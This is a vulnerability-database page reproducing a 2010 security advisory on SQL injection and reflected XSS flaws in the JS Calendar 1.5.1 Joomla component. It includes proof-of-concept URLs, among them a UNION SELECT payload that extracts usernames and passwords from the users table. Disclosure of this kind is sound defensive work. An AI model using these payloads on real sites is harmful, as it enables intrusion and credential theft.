Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

Joomla JS Calendar 1.5.1 SQL Injection / Cross Site Scripting

🗓️ 11 Oct 2010 00:00:00Reported by Salvatore FrestaType 
packetstorm
 packetstorm🔗 packetstormsecurity.com👁 25 Views

JS Calendar 1.5.1 Joomla Component Multiple Remote Vulnerabilities, SQL Injection, Cross Site Scriptin

Code
`JS Calendar 1.5.1 Joomla Component Multiple Remote Vulnerabilities  
  
Name JS Calendar  
Vendor http://www.joomlaseller.com  
Versions Affected 1.5.1  
  
Author Salvatore Fresta aka Drosophila  
Website http://www.salvatorefresta.net  
Contact salvatorefresta [at] gmail [dot] com  
Date 2010-10-09  
  
X. INDEX  
  
I. ABOUT THE APPLICATION  
II. DESCRIPTION  
III. ANALYSIS  
IV. SAMPLE CODE  
V. FIX  
  
  
I. ABOUT THE APPLICATION  
________________________  
  
JoomlaSeller - Calendar Event is a powerful Joomla!  
component which allows you to easily create events and  
publish them on a desired date. It is a native build  
component for Joomla! 1.5 version and can easily be  
installed using the Joomla! back-end Install  
functionality.  
  
  
II. DESCRIPTION  
_______________  
  
Some parameters are not properly sanitised before being  
used in a SQL query or returned to the user.  
  
  
III. ANALYSIS  
_____________  
  
Summary:  
  
A) SQL Injection  
B) Multiple Reflected XSS  
  
  
A) SQL Injection  
________________  
  
Input passed to "ev_id" parameter is not properly  
sanitised before being used in SQL queries. This can be  
exploited to manipulate SQL queries by injecting  
arbitrary SQL code.  
  
  
B) Multiple XSS  
_______________  
  
Input passed to the "month" and "year" parameters are  
not properly sanitised before being returned to the  
user. This can be exploited to execute arbitrary HTML  
and script code in a users browser session in context  
of an affected site.  
  
  
IV. SAMPLE CODE  
_______________  
  
A) SQL Injection  
  
http://site/path/index.php?option=com_jscalendar&view=jscalendar&task=details&ev_id=999 UNION SELECT 1,username,password,4,5,6,7,8 FROM jos_users  
  
  
B) Multiple XSS  
  
http://site/path/index.php?option=com_jscalendar&view=jscalendar&month=<script>alert('XSS');</script>  
  
http://site/path/index.php?option=com_jscalendar&view=jscalendar&year=<script>alert('XSS');</script>  
  
  
V. FIX  
______  
  
No fix.  
  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
11 Oct 2010 00:00Current
0.6Low risk
Vulners AI Score0.6
joomlacalendar eventsql injectioncross site scriptingjoomlasellerarbitrary html
25